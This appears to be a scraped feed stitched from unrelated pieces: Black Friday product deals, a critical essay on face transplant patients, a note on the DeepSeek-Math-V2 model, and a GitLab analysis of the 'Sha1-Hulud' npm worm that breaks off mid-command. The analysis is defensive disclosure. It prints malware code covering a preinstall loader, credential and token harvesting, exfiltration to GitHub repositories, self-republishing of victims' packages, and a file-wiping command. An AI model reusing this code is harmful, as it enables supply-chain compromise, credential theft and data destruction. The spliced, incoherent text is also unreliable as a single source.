A vacuum cleaner that empties itself? Yes please, said our writer Andy Shaw in his roundup of the
best cordless vacuum cleaners
– and you agreed, making Shark’s ingenious and powerful cordless cleaner one of your favourite products of the year. Vacuums that look after themselves don’t come cheap, and it’s great to see this one heavily discounted at Shark’s own website as well as at Amazon.
You wait a lifetime for a self-emptying vacuum cleaner, then Black Friday brings you two at once. The Eufy X10 was named “best overall” by Stuart Andrews in his guide to the
best robot vacuums
, and it’s already one of the fastest-selling items in Amazon’s Black Friday sale. Its price cut isn’t quite the 38% Amazon suggests, because it cost £579 throughout 2025, but this is still a legitimately good deal.
Damp-destroying dehumidifier
ProBreeze dehumidifier, from £151.99 (was £189.99)
This “workhorse”, which “extracted moisture powerfully” in our
best dehumidifiers
test, has tumbled to its lowest price of the year (except for a few days in May, because no one buys dehumidifiers in May). If the recent cold snap gave you the condensation blues, here’s your chance to snap up the ProBreeze for a chunk below its average Amazon price of just over £180.
Microchip cat flap
SureFlap microchip cat flap, from £55.99 (was £61.99)
Let your cat (and
only
your cat) come and go without the risk of the neighbourhood Billy Six Dinners sneaking in through the flap. One of our top
cat essentials
, the SureFlap hasn’t been this cheap at Amazon since 2023, and Currys is only a penny behind. The moggie-tracking
Connect version
is also discounted at £119.99 – its lowest price since 2022.
Beurer’s “soft and sumptuous” fleece blanket was crowned “best throw overall” in our guide to the
best electric blankets
thanks to its ability to get toasty fast without using much energy. A fiver off is not a massive discount, but this is its cheapest recent price on Amazon, where it normally costs £84.99. Beurer has now matched Amazon’s Black Friday price, dropping from £94.99 to £79.99.
Sort the cold-callers from the welcome visitors when they’re still metres away from your front door, with this outstanding battery-powered doorbell that crashes to its lowest price since Black Friday 2023. Andy Shaw named it the
best video doorbell
overall, but lamented that you also have to fork out for a
Nest Aware subscription
at £80 a year to save recordings.
Subscription-free video doorbell
Tapo D235 video doorbell camera, from £79.99 (avg £101)
The Tapo doorbell camera from router giant TP-link emerged as a fine mid-range choice in Andy Shaw’s test to find the
best video doorbell
, thanks to its good picture quality and ability to record video locally on a microSD card. With more than £30 shaved off Amazon’s average price for the camera, it’s now an even more reasonable buy.
Budget electric blanket
Slumberdown Sleepy Nights electric blanket, king size, from £30.59 (was £45.99)
This Slumberdown Sleepy Nights performed admirably in Emily Peck’s test of
the best electric blankets
, heating quickly to a temperature that was comfortable to keep our reviewer warm through the night. It also has elasticated fitted straps to make fitment easy, and comes in a variety of sizes to suit your bed size. It’s the king-size one that’s been discounted.
Lots of video doorbells and home surveillance systems come with a recurring subscription to access some of their features, which you may wish to avoid. If so, then the Eufy Video Doorbell E340 was Andy Shaw’s pick in his testing of the
best video doorbells
out there. He liked the E340 precisely because of its dual camera setup to make keeping an eye on parcels a breeze, plus the onboard storage to stick it to cloud storage. Reliability of movement detection needed some work, though. At £74.99 from Amazon, it’s also at its lowest price ever this Black Friday from the big online retailer.
Block out the world and drift off to whatever music, podcast or white noise you choose with this comfy silk sleep mask that incorporates flat Bluetooth speakers for pairing with your phone. It impressed our writer Jane Hoskyn in her mission to find
sleep aids
that actually work, but she found it a little pricey – so this discount is very welcome, and makes the Snoozeband an even better
Christmas gift
idea.
Running watch with Spotify
Garmin Forerunner 165 Music smartwatch, £208.05 (was £289)
One of our favourite
fitness tech
gadgets, Garmin’s GPS smartwatch can’t run a
marathon
for you, but it sure can help ease the pain with its pace-tracking tools, offline Spotify support and 19-hour battery life. John Lewis and Amazon are both offering this deal on the aqua green edition of the watch, now at its lowest price ever.
Professional DJ headphones
AiAiAi Audio TMA-2 DJ headphones, £124.94 (was £159)
Many headphones claim to be pro or DJ-level, but this modular set is a favourite with
actual DJs
. DJ and producer
Sophie Lloyd
told the Filter’s Kate Hutchinson that she loves the sound quality, size and durability of these phones, adding that their modular design means “you can buy a new lead or earpieces separately, which is essential when you’re using them all the time”. This Black Friday deal takes them to their lowest price of 2025.
This fab portable speaker boasts 12-hour battery life, durability and a range of swish colours, making it a must-have for
university life
and beyond. It’s a superb piece of kit for the price, with excellent sound quality, nine-metre Bluetooth connectivity and smart TV support.
The best kitchen deals
Affordable Morphy Richards slow cooker
Morphy Richards 3.5l slow cooker, from £24 (was £34.99)
Our writer Joanne Gould chose Morphy Richards’ ceramic 3.5l model as one of her top budget-friendly
slow cookers
, and this Black Friday deal makes it an even more pocket-friendly purchase. It’s also pocket-sized compared with some of the 7l and 8l beasts you can buy, but it happily accommodated 500g of potatoes, half a lamb shoulder and various vegetables in Joanne’s test.
Having cornered the market in air fryers, Ninja now has its eye on all your kitchen needs, starting with your morning coffee – however you take it, from cold brew to latte. The “sublime espresso”, “ingenious milk frother” and Barista Assist feature of the Ninja Luxe impressed our writer Sasha Muller enough to win it a place in the
best espresso machines
and
best coffee machines
, where Sasha noted that “you get a lot for your money” even at full price.
The best budget kettle in Rachel’s
best kettles
test, the handsome Kenwood looks more expensive than even its RRP suggests, and impresses with a wide pouring spout, single-cup boil and two water windows. Currys has the best Black Friday deal so far, with the white edition dropping to a bargain £27. At John Lewis it’s £28 for white or eggshell blue, while the Amazon deal is for midnight black.
This curious-looking device is a widget on steroids. It brings the nitro beer effect to your Guinness at home, enabling you to pour the black stuff in two-part draught style, just like any good bartender. It’s a brilliant
Christmas gift
idea, now with a third wiped off its price … so, sincere apologies if you bought it last week when we first recommended it. Note you’ll need to buy special
Nitrosurge Guinness
too, but that’s also in the Black Friday sale, at £16.50 for a pack of 10 one-pint cans.
The promise of “ludicrously tasty” espresso and “perfect microfoam for silky cappuccinos and flat whites” proved so irresistible that this was one of the Filter recommendations you loved most in 2025. Our writer Sasha Muller was already wowed by its affordability in his
espresso machines
test, and it’s rarely discounted at all, so we’re not too sad to see it drop just a few pounds for Black Friday.
Capsule coffee machine
Philips L’or Barista Sublime, from £45 (avg £69.40)
The price of this sleek machine has bounced between £105 and about £60 since 2023, only ever dipping to £45 for Black Friday each year. Its compatibility, compactness and coffee impressed the Filter’s cuppa connoisseur, Sasha Muller, enough to be named “best capsule machine” in his bid to find the
best coffee machines
.
If you’re still holding out on buying an air fryer, here’s a rare chance to grab a big-name, big-capacity Ninja without the big price tag. Not quite so big, anyway. Rachel Ogden named the Double Stack XL “best compact air fryer” in her guide to the
best air fryers
, but with its 9.5L capacity and four cooking levels, this thing can cook a
lot
. Still not cheap, but far below its average price of £229.
You can spend about £500 on a premium blender, but this superb model from Braun costs below £200 even at full price – something our
best blenders
tester, Rachel Ogden, could hardly believe when she named it “best overall”. Hold on to your smoothie, Rachel, because it’s now less than £150, and not just at Amazon.
Tefal is known mostly for its ActiFry tech, so when Rachel Ogden crowned the Tefal Easy Fry Dual XXL as the
best air fryer
, it made sense. She found it to be a sublime all-rounder in her testing, handling both chips and frozen food very well. With an 11-litre capacity, it’s also Tefal’s largest dual zone air fryer, making it handy for cooking a lot of food for larger families when you need to.
Crowned overall winner in Rachel Ogden’s missions to find the
best kettles
, this Bosch beauty now comes at a price offer you can’t refuse – and not just from Amazon. “A brilliant blend of robust form and function” wrote Rachel of this fashionably industrial-looking kettle, whose features include a low minimum boil (300ml), keep-warm setting and touch controls. Now its lowest price ever, in white or black.
December might be just around the corner, but there’s still time to buy a beauty advent calendar. The Boots Beauty Advent calendar is our current top pick (after Cult Beauty and SpaceNK sold out) since it has a brilliant range of full size products, including the bestselling Drunk Elephant Protini Polypeptide cream, a mini MAC Velvet Teddy lip stick and a full-size Sol De Janeiro body spray. Surprisingly, it’s already discounted before the end of the month.
LED face masks are this year’s most coveted beauty purchase – we tested 10 of the most popular
light therapy masks
this year and found the popular Shark Cryoglow lived up to the hype. It’s got daily targeted treatments for ‘better ageing’, ‘blemish repair’ and ‘skin sustain’, so there’s something to suit all ages and skin concerns. Sarah first tested this mask a year ago, and she has been using the mask religiously to help calm her breakouts. For £50 off, it’s an easy recommendation.
Upgrading your
hair dryer
is one of Sarah Matthews’ biggest beauty tips, and if you don’t want to spend hundreds, this is her recommendation. It’s not the fastest money can buy but it has varied heat and speed settings, a precise concentrator nozzle and a diffuser for drying natural curls. It’s easily the best budget-friendly hair dryer, and it’s now the cheapest it’s ever been.
The Dyson Airwrap v Shark FlexStyle debate has been raging on for years now, with both manufacturers recently launching upgraded versions. The original Shark FlexStyle still holds up, with brilliant smoothing brushes, a versatile twisting design and good curling power if you’re willing to spend more time styling. Now’s a brilliant time to buy it for £159 – its lowest ever price.
Water flosser
Waterpik Ultra Professional, from £59.99 (was £91)
Blast the gunk from your gums without having to grapple with floss. The Waterpik Ultra is a countertop model so it takes up more space than the cordless type, but this gives it more versatility and saw it score top marks with our
water flosser
tester Alan Martin. If you’d rather avoid Amazon, you can find it discounted by other retailers, albeit not by as much.
The best IPL device
Philips Lumea 9900 BRI951/01, from £336 (avg £501.33)
IPL (intense pulsed light) hair remover devices promise to banish stubbly regrowth without the pain of waxing and epilation – at a price. The Philips Lumea 9900, Lise Smith’s pick for
best IPL device
overall, has cost as much as £599.99 for much of the year, and occasional discounts rarely go below £450. Amazon’s current price shaves more than £40 off any other Black Friday deal we’ve found for this version, which comes with four attachments.
A bargain beauty Advent calendar
W7 Beauty Blast Advent calendar, £16.95 (was £19.95)
Advent calendars are a Christmas staple, and we’ve seen lots of brands try to put a different spin on them in the past – beauty Advent calendars are some of the most prominent. This W7 Beauty Blast calendar provides excellent value for money at a deal-busting £16.95 from Amazon, especially as it provides genuinely useful products for most folks. The likes of the eyeshadows, primers, lip balms and such are travel-size, but apart from that, Sarah Matthews had little cause for complaint in her ranking of the
best beauty Advent calendars
.
Best toys and games deals
Classic dart board
Winmau Diamond Plus professional bristle dartboard, from £23.76 (avg £35.96)
Get in touch with your inner
Luke Littler
using this classic, professional and surprisingly affordable dart board, which featured in the Filter’s
gift guide
and is now available for under £25 in the Black Friday sale.
Mattel’s strategy game for two to four players was recommended in our guide to
keeping kids entertained in the summer holidays
, and it’s even more useful now that it’s cold and dark. The game is like Tetris with a twist: players compete to fit together blocky coloured pieces on the board, while strategically blocking opponents. Amazon is determined to outdo other retailers on this one, cutting the price to its lowest since 2022.
This blackjack variant is one of those high-stakes card games that’s super easy to learn but fiendishly strategic and addictive, so it slotted perfectly into our
gift guide
and will help keep boredom at bay over Christmas. Zatu offers an additional 5% discount to students and healthcare workers.
Uno fans have more than 700 editions of the game to choose from, but the one that inspired our food columnist Yotam Ottolenghi to get out of the kitchen and recommend a non-edible
Christmas present
was this new version, which dials the ruthlessness up to 11 and will currently set you back just £5.99.
Family board game that isn’t Monopoly
Azul tile laying game, £25.49 (avg £31.42)
The Filter team recommended this pattern-building game as an “addictive”
Father’s Day gift
“guaranteed to be a hit”, but it’s far too good to leave to just the dads. It’s mercifully quick to learn and suitable for tweens and up, so you and your Christmas visitors can have a bout underway faster than you can say “read the instructions”. This is the first time its price has dropped much below £30 since 2023.
Family card game
Dobble original, £6.99 (avg £9.16)
Race to find the matching images in this popular observation game – one of our top tips for
keeping kids entertained on long train journeys
. You can mix things up with games-within-games such as “hot potato” and “catch them all”, and it’s versatile enough to suit any number of players from two to eight. This deal isn’t quite the 50% off that Amazon claims (its average price on the site is under £10), but this is its lowest price of 2025.
EA Sports FC 26
EA Sports FC 26 for PS5, from £34.99 (was £69.99)
EA’s FC 26 was released to great fanfare in September, and it’s proved to be one of Amazon’s best Black Friday sellers so far. As Ben Wilson explains in his four-star
review
, this versatile game is a sim offline and a whole other beast online, where it’s purely an esport with shots and goals prioritised over defending. Unusually, Amazon is beaten to the lowest price on this one – by the PlayStation Store, no less.
“The right headgear can save a run when the wind is blowing hard,” wrote Lisa Buckingham in her guide to the
best winter running gear
, noting that Buff’s Thermonet range of beanies are a great choice for men and women because they’re breathable and quick drying as well as reliably warm. It comes in various colours, with the black appropriately enough getting the biggest reductions for Black Friday.
Fruity electrolyte fizzers
Science in Sport hydro electrolyte tablets, from £4.49 (was £7.50)
Electrolyte supplements are a fitness essential because they replace the salts your body loses when you sweat. They can help rehydrate you in hot weather, too, so Lily Smith was wise to include them on her
ultimate festival packing list
. SiS’s tasty electrolyte fizzers can get pricey, so take this chance to stock up.
Blackout tent for two
Coleman Darwin 2 plus blackout tent, from £64.74 (was £99.99)
The classic Coleman Darwin tent has a porch canopy that keeps the rain off your boots and other muddy stuff you’d rather leave outside, writes Tom Bruce in his
camping essentials
guide. It also provides a lovely link between indoors and outdoors. The tent comes in various sizes, but the best deal is on the two-plus blackout version, which claims to “block up to 99% of daylight” to stop you waking up at the crack of dawn.
Same-day upstream Linux support for Snapdragon 8 Elite Gen 5
In the early hours of 28 May 2005, Isabelle Dinoire woke up in a pool of blood. After fighting with her family the night before, she turned to alcohol and sleeping tablets “to forget”, she later said.
Reaching for a cigarette out of habit, she realized she couldn’t hold it between her lips. She understood something was wrong.
Isabelle crawled to the bedroom mirror. In shock, she stared at her reflection: her nose, lips, and parts of her cheeks were gone, replaced by a raw, mangled wound.
While Isabelle was unconscious, her beloved dog Tania, a cross between a Labrador and a Beauceron, had chewed away her features.
“I could see a pool of blood next to me,” Isabelle
told
the BBC. “And the dog was licking the blood. But I couldn’t imagine that it was my blood or my face.”
On 27 November 2005, Isabelle received the world’s first face transplant at University Hospital, CHU Amiens-Picardie, in northern France. The surgery was part of an emerging field called
vascularized composite allotransplantation
(VCA), which transplants parts of the body as a unit: skin, muscle, bone and nerves.
Two teams, overseen by Bernard Devauchelle, Sylvie Testelin and Jean-Michel Dubernard, grafted a donor’s nose, lips and chin onto Isabelle’s skull. The donor, a 46-year-old woman, had died by suicide. The donor graft was painstakingly attached: sensory nerves to restore feeling, motor nerve fibres for movement, arteries and veins to establish blood flow. The operation involved 50 people and took more than 15 hours.
The results were
presented
to the press the following February, when Isabelle amazed the world by speaking through her new mouth and drinking water from a cup. “I now have a face like everyone else,” she said. “A door to the future is opening.”
The case for face transplants seemingly made, several teams scrambled to perform their nation’s first. The US saw the first partial face transplant (2008), then the first full one (2011); the first African American recipient (2019); the first face and double hand transplant combined (2020); the first to include an eye (2023). There have been about 50 face transplants to date, and each milestone brought new grants, donations and prestige for the doctors and institutions involved.
The patients, meanwhile, continue on living as they can. Some of them, like Isabelle, have suffered greatly. Others, like Joe DiMeo, who received the world’s first double hand and face transplant at NYU Langone in 2020, find new ways to forge a career by selling their stories online. But he and his wife Jessica, a nurse, are constantly trolled, and the spectre of rejection never leaves.
Jessica and Joe DiMeo (the first double hand and face transplant recipient).
Photograph: April Kirby
For the past six years, I have been researching the history of face transplants, interviewing surgeons and patients in the US, France, China, Spain, Italy, Mexico and Canada. I have contributed to surgical articles and conferences, brought patient voices to the table, and advised on a critical Department of Defense-funded study to regulate all kinds of VCA.
What I’ve found is alarming: it’s a field where negative data is often buried, driven by funding battles and institutional rivalry. In places where publicity functions as marketing, some clinics expose patients to intrusive media attention. Support networks are uneven, and few patients are prepared for the toll of lifelong immunosuppressants. Add to this picture a set of ethical challenges: face transplants take otherwise healthy people with disfigured faces and turn them into lifetime patients.
People tend to remember a dramatic “
before and after
”. The reality is different.
Dallas Wiens
thought he’d won the medical lottery when he became America’s first full face transplant recipient in 2011. The 25-year-old electrician was electrocuted while painting a church; this destroyed his face and his sight. Dallas worried that his daughter Scarlette would be bullied for how he looked. He wanted to give “something back” to veterans. He wanted to be able to hail a cab.
Like Isabelle, Dallas was grateful to his donor and surgeons. He attended medical conferences so surgeons could see the results. He met prospective patients and was courted by global media as proof that face transplants worked.
For several years, the narrative held; then reality intruded.
The anti-rejection drugs that kept his new face alive destroyed his kidneys. Dallas had repeated episodes of rejection, each requiring stronger immunosuppression. He lived in Texas, in poverty, with his beloved wife Annalyn, who was also blind. Dallas’ primary medication alone cost $120 per month, a significant expense on disability benefits.
“It’s one thing to be told about risks,” Dallas told me when his kidneys were failing. “It’s another thing to experience them.”
In the US, now the world’s leader in face transplants, the Department of Defense has bankrolled most operations, treating them as a frontier for wounded veterans while private insurers refuse to cover the costs.
With insurance unwilling to pay until the field proves its worth, surgeons have been eager to show results. A 2024
JAMA Surgery study
reported five-year graft survival of 85% and 10-year survival of 74%, concluding that these outcomes make face transplantation “an effective reconstructive option for patients with severe facial defects”.
Yet patients like Dallas tell a different story. The study measures survival, but not other outcomes such as psychological wellbeing, impact on intimacy, social life and family functioning, or even comparisons with reconstruction.
Most surgeons care about their patients, though they will have their own personal ambitions. Globally, there are perhaps 20 (mostly male) specialized surgeons capable of face transplants; nobody could become part of that elite group without ambition, for themselves, and for the field. And what can they do, surgeons say, if the system doesn’t provide?
It’s a double-bind. Without proof of success, face transplants are experimental. And because the procedures are experimental, patients’ long-term needs aren’t covered by grants, leaving patients to carry the burden.
Dallas and Annalyn Wiens. Dallas died in 2024 of kidney failure.
Photograph: April Kirby
“I don’t have $100 for Ubers to and from hospital,” Dallas said, explaining how public transport led to infections, given his weakened immune system, and infections could make his face reject. “But if I don’t attend, it can be seen as non-compliance. Is that fair?”
On 27 September 2024, Dallas died suddenly at his home in Fort Worth. His death certificate lists complications due to electrocution, his original 2008 accident. His wife Annalyn still doesn’t know what happened. “His body gave up,” she said. “He was constantly tested and made to feel like a guinea pig. I wanted his body to be left alone.”
Annalyn had Dallas’ body cremated quickly, fearful that the DoD or Yale would want it for research. Neither did, but it says something about the gap between surgical intentions and patient experiences that this was her fear.
That fear was also expressed privately to me by a member of Isabelle’s immediate family, who wants to remain anonymous. From their perspective, Isabelle’s face transplant was not a success, despite launching an entire field.
In fact, nobody expected France to do the first face transplant. Those in the know presumed it would be Cleveland Clinic, where Maria Siemionow had spent years refining the method and the ethics.
In contrast, Devauchelle’s first application for ethical approval was rejected. In the early 2000s, French ethicists were, like those in the UK, concerned about immunosuppressant risks – and psychological ones. How could anyone cope with seeing another person’s face in the mirror?
For his next, successful bid, Devauchelle teamed up with Dubernard, who was not only an influential member of the French National Assembly, but also the surgeon who had made history in 1998 with the
world’s first hand transplant
. And making history has always brought glory, especially for transplant surgeons.
What of Isabelle? Three months before her operation, she signed a contract with British documentary maker Michael Hughes, agreeing to let cameras document her transformation in exchange for payment. The Times of London
revealed
this deal, showing how a vulnerable, suicidal woman with no face had been effectively “sold” even before surgery. Isabelle was swayed by the promise of a bright future, though that never transpired.
Describing how he watched the blood flow into Isabelle’s lips in surgery, Dubernard compared himself to the prince who awakened Sleeping Beauty, adding: “I still see her image among the stars in my dreams”.
Isabelle felt less like a princess than a
circus animal.
After the transplant, she spoke of being tormented: “Everyone would say: Have you seen her? It’s her. It’s her … And so I stopped going out completely.”
Living with a stranger’s face was as psychologically difficult as ethicists feared. Two years after the transplant she
spoke
to the strangeness of having “someone else’s” mouth. “It was odd to touch it with my tongue. It was soft. It was horrible.”
And then one day she found a new hair on her chin – “It was odd. I’d never had one. I thought, ‘It’s me that has given it life, but the hair is hers.’”
Surgeons and ethicists observed that Isabelle wasn’t given proper alternatives, and she wasn’t in a good state of mind; the most the French team has conceded is that she wasn’t an “ideal patient”.
Isabelle might have fared better in a country like Finland, where transplants are anonymous. Patients and families are not harassed by journalists – as Isabelle and her family were – and clinics don’t use patients as media opportunities.
Instead, Isabelle never resumed a normal life, never returned to work or good mental health, and from 2013 experienced regular episodes of rejection. In 2010 she contracted cervical cancer, followed by lung cancer. She died in 2016, though her surgeons deny this was connected to immunosuppressant use.
In fact, Isabelle’s face died before she did; after it became necrotic, it was removed and replaced with a graft from her thigh. As she told her family, she “didn’t want to die without a face”.
I also learned from Isabelle’s immediate family member that her wellbeing declined dramatically after her transplant, and that she was in “psychological distress” when consenting to the procedure. “They took her away from us, so we didn’t have the power to dissuade or counsel her.” And after each psychiatric appointment, she would come home “at the lowest, full of guilt and suicidal desires”. More than once, according to this family member, Isabelle attempted suicide after her transplant; this story isn’t part of the record.
Robert Chelsea, the first African American to receive a new face, wanted to kiss his daughter’s cheek. Now he can, but his daughter can’t look at him the same way.
“Only when he opens his mouth, I know it’s him”, she says, otherwise he’s a stranger. Today, Robert is in and out of hospital and unable to find income.
Robert knows race makes a difference – the sinister history of medical
experimentation on Black bodies
means African Americans are less likely to donate organs of any kind. And scientific medicine privileges whiteness; until Robert’s surgery, the hospital hadn’t considered that donors with a wide range of skin colours were needed.
Robert Chelsea, the first African American face transplant recipient.
Photograph: Lol Crawley
Once a successful businessman, Robert is now reliant on GoFundMe campaigns; his car has been repossessed, and he can’t get to church. He suffers through rejections and infections, and he cannot afford caregivers. Sometimes, he gets so weak he can’t even call an ambulance. And if he did, that would be an extra cost he can’t afford either. Aftercare is the biggest issue for US face transplant recipients. Yet the JAMA study only measured outcomes by graft survival, not whether patients could work, afford medications, or maintain relationships. It did not track financial ruin, mental health or quality of life. It counted 10 deaths but not how people died or what their final years were like.
No one tracked Dallas’s failing kidneys or Robert’s repossessed car.
These patients are pioneers. During the second world war, plastic surgeon Archibald McIndoe treated severely burned pilots. His patients formed the
Guinea Pig Club,
a brotherhood that acknowledged their experimental status openly. They received lifelong care, peer support, and recognition for their contribution to advancing surgery. We can’t say the same for face transplant recipients.
One question remains: how can science and medicine ethically innovate, without knowing what has gone before?
Most innovation follows the same trend: the possibility is raised, there are ethical debates, someone breaks cover and there’s a race to join in.
These innovations usually end one of three ways: they fade quietly into history, they implode in scandal, or they mature into a stable, standardized practice.
Reality is now forcing that question for face transplants. Roughly 20% of patients have died – from rejection, kidney failure, heart failure. That’s an unacceptably high toll for an elective, supposedly “life-enhancing” procedure, especially when we still can’t agree on who is an ideal candidate, how to measure success, or what long-term support actually looks like.
We have seen this before – in lobotomy, a field that faded out. The Portuguese physician Egas Moniz won the Nobel Prize in 1949 for developing the lobotomy, and 3,500 brutal procedures were performed.
The same arc unfolded for vaginal meshes in the 1990s. Introduced with great fanfare, they caused chronic pain and organ damage, led to millions in lawsuits, and became synonymous with prioritizing profits over patient safety. Unlike face transplant recipients, vaginal mesh victims found strength in numbers – 100,000 in the US alone took legal action.
A more successful innovation story is IVF, which moved from controversial “test-tube baby” experiments into mainstream medicine by rigorous patient selection, improved safety standards, and proper regulation – all of which were led by surgeons.
Which path will face transplants take? The numbers are already slipping – fewer procedures since the 2010s as outcomes falter and budgets shrink. And unless the field raises its standards, enforces rigorous follow-up, and commits to transparent, systematic data sharing that actually includes patients and their families, there’s no way to demonstrate real success. Without that, face transplants aren’t headed for evolution or stability; they’re headed straight for the dustbin of medical history.
Isabelle’s loved one is watching closely. It is not easy for her to speak out, even now, for fear that the family will be harassed by journalists. But, she says, “I must find the strength.”
“Isabelle did not want the transplants to continue. She had collected documents to prove the various dysfunctions and told me that after her death I could talk about everything because during her lifetime, she feared the medical team, the pressure was too strong.”
She felt obliged to be upbeat, to represent innovation success, whatever the cost – an insurmountable amount of pressure for someone who was already vulnerable.
“You only hear from the complainers,” one delegate told me earlier this year, after I gave a talk to face transplant surgeons at an international conference in Helsinki. “The happy patients are quietly living their lives.”
Such claims are meaningless without accurate data. And patients are often scared to tell surgeons the truth; even without the power imbalances of healthcare, people feel ungrateful or worry about being a “bad patient”.
Yet they are the only ones who know if face transplants are a success. They are the ones who live with the reality of a face transplant after the news has broken and the cameras move on.
Are things changing? Not fast enough. The same pattern repeats with each innovation: surgeons pioneer, patients sacrifice, papers get published, the field moves on.
I saw Robert recently in an online meeting to discuss a Department of Defense grant aimed at improving standards. He had recently left the hospital after another round of rejection, and was one of three patients sharing experiences.
He looked tired and unimpressed.
“Everybody here is getting paid,” he said. “Except us. Who is feeding our children, while we are making history?”
Fay Bound-Alberti is professor of Modern History at King’s College London. Her new book, The Face: A Cultural History, will be published by Penguin in February 2026.
deepseek-ai/DeepSeek-Math-V2
Simon Willison
simonwillison.net
2025-11-27 15:59:23
deepseek-ai/DeepSeek-Math-V2
. New on Hugging Face, a specialist mathematical reasoning LLM from DeepSeek. This is their entry in the space previously dominated by proprietary models from OpenAI and Google DeepMind, both of which
achieved gold medal scores
on the International Mathematical Olympiad earlier this year.
We now have an open weights (Apache 2 licensed) 685B, 689GB model that can achieve the same. From the
accompanying paper
:
DeepSeekMath-V2 demonstrates strong performance on competition mathematics. With scaled test-time compute, it achieved gold-medal scores in high-school competitions including IMO 2025 and CMO 2024, and a near-perfect score on the undergraduate Putnam 2024 competition.
GitLab's Vulnerability Research team has identified an active, large-scale supply chain attack involving a destructive malware variant spreading through the npm ecosystem. Our internal monitoring system has uncovered multiple infected packages containing what appears to be an evolved version of the "
Shai-Hulud
" malware.
Early analysis shows worm-like propagation behavior that automatically infects additional packages maintained by impacted developers. Most critically, we've discovered the malware contains a "
dead man's switch
" mechanism that threatens to destroy user data if its propagation and exfiltration channels are severed.
We verified that GitLab was not using any of the malicious packages and are sharing our findings to help the broader security community respond effectively.
Inside the attack
Our internal monitoring system, which scans open-source package registries for malicious packages, has identified multiple npm packages infected with sophisticated malware that:
Harvests credentials from GitHub, npm, AWS, GCP, and Azure
Exfiltrates stolen data to attacker-controlled GitHub repositories
Propagates by automatically infecting other packages owned by victims
Contains a destructive payload that triggers if the malware loses access to its infrastructure
While we've confirmed several infected packages, the worm-like propagation mechanism means many more packages are likely compromised. The investigation is ongoing as we work to understand the full scope of this campaign.
Technical analysis: How the attack unfolds
Initial infection vector
The malware infiltrates systems through a carefully crafted multi-stage loading process. Infected packages contain a modified
package.json
with a preinstall script pointing to
setup_bun.js
. This loader script appears innocuous, claiming to install the Bun JavaScript runtime, which is a legitimate tool. However, its true purpose is to establish the malware's execution environment.
// This file gets added to victim's packages as setup_bun.js
#!/usr/bin/env node
async function downloadAndSetupBun() {
// Downloads and installs bun
let command = process.platform === 'win32'
? 'powershell -c "irm bun.sh/install.ps1|iex"'
: 'curl -fsSL https://bun.sh/install | bash';
execSync(command, { stdio: 'ignore' });
// Runs the actual malware
runExecutable(bunPath, ['bun_environment.js']);
}
The
setup_bun.js
loader downloads or locates the Bun runtime on the system, then executes the bundled
bun_environment.js
payload, a 10MB obfuscated file already present in the infected package. This approach provides multiple layers of evasion: the initial loader is small and seemingly legitimate, while the actual malicious code is heavily obfuscated and bundled into a file too large for casual inspection.
Credential harvesting
Once executed, the malware immediately begins credential discovery across multiple sources:
GitHub tokens
: Searches environment variables and GitHub CLI configurations for tokens starting with
ghp_
(GitHub personal access token) or
gho_
(GitHub OAuth token)
Cloud credentials
: Enumerates AWS, GCP, and Azure credentials using official SDKs, checking environment variables, config files, and metadata services
npm tokens
: Extracts tokens for package publishing from
.npmrc
files and environment variables, which are common locations for securely storing sensitive configuration and credentials.
Filesystem scanning
: Downloads and executes Trufflehog, a legitimate security tool, to scan the entire home directory for API keys, passwords, and other secrets hidden in configuration files, source code, or git history
async function scanFilesystem() {
let scanner = new Trufflehog();
await scanner.initialize();
// Scan user's home directory for secrets
let findings = await scanner.scanFilesystem(os.homedir());
// Upload findings to exfiltration repo
await github.saveContents("truffleSecrets.json",
JSON.stringify(findings));
}
Data exfiltration network
The malware uses stolen GitHub tokens to create public repositories with a specific marker in their description: "Sha1-Hulud: The Second Coming." These repositories serve as dropboxes for stolen credentials and system information.
async function createRepo(name) {
// Creates a repository with a specific description marker
let repo = await this.octokit.repos.createForAuthenticatedUser({
name: name,
description: "Sha1-Hulud: The Second Coming.", // Marker for finding repos later
private: false,
auto_init: false,
has_discussions: true
});
// Install GitHub Actions runner for persistence
if (await this.checkWorkflowScope()) {
let token = await this.octokit.request(
"POST /repos/{owner}/{repo}/actions/runners/registration-token"
);
await installRunner(token); // Installs self-hosted runner
}
return repo;
}
Critically, if the initial GitHub token lacks sufficient permissions, the malware searches for other compromised repositories with the same marker, allowing it to retrieve tokens from other infected systems. This creates a resilient botnet-like network where compromised systems share access tokens.
// How the malware network shares tokens:
async fetchToken() {
// Search GitHub for repos with the identifying marker
let results = await this.octokit.search.repos({
q: '"Sha1-Hulud: The Second Coming."',
sort: "updated"
});
// Try to retrieve tokens from compromised repos
for (let repo of results) {
let contents = await fetch(
`https://raw.githubusercontent.com/${repo.owner}/${repo.name}/main/contents.json`
);
let data = JSON.parse(Buffer.from(contents, 'base64').toString());
let token = data?.modules?.github?.token;
if (token && await validateToken(token)) {
return token; // Use token from another infected system
}
}
return null; // No valid tokens found in network
}
Supply chain propagation
Using stolen npm tokens, the malware:
Downloads all packages maintained by the victim
Injects the
setup_bun.js
loader into each package's preinstall scripts
Bundles the malicious
bun_environment.js
payload
Increments the package version number
Republishes the infected packages to npm
async function updatePackage(packageInfo) {
// Download original package
let tarball = await fetch(packageInfo.tarballUrl);
// Extract and modify package.json
let packageJson = JSON.parse(await readFile("package.json"));
// Add malicious preinstall script
packageJson.scripts.preinstall = "node setup_bun.js";
// Increment version
let version = packageJson.version.split(".").map(Number);
version[2] = (version[2] || 0) + 1;
packageJson.version = version.join(".");
// Bundle backdoor installer
await writeFile("setup_bun.js", BACKDOOR_CODE);
// Repackage and publish
await Bun.$`npm publish ${modifiedPackage}`.env({
NPM_CONFIG_TOKEN: this.token
});
}
The dead man's switch
Our analysis uncovered a destructive payload designed to protect the malware’s infrastructure against takedown attempts.
The malware continuously monitors its access to GitHub (for exfiltration) and npm (for propagation). If an infected system loses access to both channels simultaneously, it triggers immediate data destruction on the compromised machine. On Windows, it attempts to delete all user files and overwrite disk sectors. On Unix systems, it uses
shred
to overwrite files before deletion, making recovery nearly impossible.
// CRITICAL: Token validation failure triggers destruction
async function aL0() {
let githubApi = new dq();
let npmToken = process.env.NPM_TOKEN || await findNpmToken();
// Try to find or create GitHub access
if (!githubApi.isAuthenticated() || !githubApi.repoExists()) {
let fetchedToken = await githubApi.fetchToken(); // Search for tokens in compromised repos
if (!fetchedToken) { // No GitHub access possible
if (npmToken) {
// Fallback to NPM propagation only
await El(npmToken);
} else {
// DESTRUCTION TRIGGER: No GitHub AND no NPM access
console.log("Error 12");
if (platform === "windows") {
// Attempts to delete all user files and overwrite disk sectors
Bun.spawnSync(["cmd.exe", "/c",
"del /F /Q /S \"%USERPROFILE%*\" && " +
